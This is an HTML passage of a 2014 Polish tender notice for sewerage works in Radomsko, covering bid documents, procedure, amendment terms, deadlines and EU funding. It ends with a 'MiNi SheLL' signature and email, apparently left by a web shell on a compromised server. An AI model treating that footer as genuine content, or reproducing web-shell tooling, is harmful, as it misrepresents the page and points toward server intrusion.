3) Zaparafowany przez Wykonawcę projekt umowy. Wzór projektu znajduje się w 
      załączniku nr 7 do SIWZ. 
4) Dowód wniesienia wadium.

Zgodnie z art.26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, 
    potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach 
    finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi 
    stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że 
    będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności 
    przedstawiając w tym celu oryginał dokumentu pisemnego zobowiązania tych podmiotów 
    do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy 
    wykonaniu zamówienia. Z zobowiązania podmiotu do udostępnienia Wykonawcy zasobów 
    winny wynikać następujące okoliczności:
  - jaki jest zakres dostępnych zasobów,
  - jaki będzie sposób ich wykorzystania przy wykonywaniu zamówienia,
  - charakter stosunku, który będzie łączył Wykonawcę z innym podmiotem,
  - jaki jest zakres i czas udziału innego podmiotu przy realizacji zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian w umowie, pod warunkiem 
    spełnienia przesłanek ustawowych określonych w art. 144 Prawa zamówień publicznych, w 
    szczególności:
a) dotyczących zmiany inspektorów nadzoru oraz innych osób wyznaczonych do realizacji 
    postanowień niniejszej umowy przez Wykonawcę,
b) wystąpienia opóźnień w realizacji umowy powstałych w wyniku okoliczności będących po 
    stronie Zamawiającego, powodujących zmianę ostatecznego terminu realizacji przedmiotu 
    zamówienia, 
c) wynikających z opóźnień w realizacji robót budowlanych z przyczyn leżących po stronie 
    Wykonawcy tych robót, powodujących konieczność przedłużenia ostatecznego terminu 
    realizacji przedmiotu niniejszej umowy, 
d) w przypadku zmiany możliwości finansowych Zamawiającego ( zmniejszenie lub 
    zwiększenie ), powodujących konieczność zmiany zakresu lub terminu niniejszej umowy,
e) w przypadku zwiększenia lub zmiany zakresu umowy o roboty budowlane wynikających w 
    szczególności z udzielenia zamówień dodatkowych lub uzupełniających,
f) wynikających z działań organów administracji, w szczególności: przekroczenia 
    zakreślonych przez prawo terminów wydania przez organy administracji decyzji, zezwoleń, 
    uzgodnień itp. lub odmowa ich wydania przez organy administracji.
2. W przypadku zmiany wysokości obowiązującej stawki od towarów i usług, strony umowy 
    postanawiają, że wynagrodzenie netto określone w § 5 ust.1 pozostanie bez zmian. Kwota 
    brutto zostanie obliczona na podstawie stawki tego podatku obowiązującej w chwili 
    powstania obowiązku podatkowego.
3. Przewidziane w pkt 1 powyżej okoliczności, stanowiące podstawę do wprowadzenia 
    aneksu do umowy, stanowią uprawnienie Zamawiającego, nie zaś jego obowiązek. 
    Okoliczności te nie mogą również stanowić podstawy roszczeń Wykonawcy o dodatkowe 
    wynagrodzenie i/lub odszkodowanie.  
4. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie 
    leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, 
    Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o 
    powyższych okolicznościach. W takim wypadku Wykonawca może żądać wynagrodzenia 
    należnego mu z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgk-radomsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.
97-500 Radomsko, ul. Stara Droga 85 pokój nr 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2014 godzina 13:00, miejsce: Sekretariat Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o.
97-500 Radomsko, ul. Stara Droga 85.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach projektu pn.: Rozbudowa kanalizacji sanitarnej na terenie aglomeracji Radomsko, ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko.

Program: Infrastruktura i Środowisko 2007-2013.

Oś priorytetowa: I - Gospodarka wodno-ściekowa.

Działanie: 1.1  - Gospodarka wodno-ściekowa w aglomeracjach powyżej 15 tys. RLM.

Numer umowy: POIS.01.01.00-00-014/13-00 zawarta w Łodzi dnia 25.03.2014 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com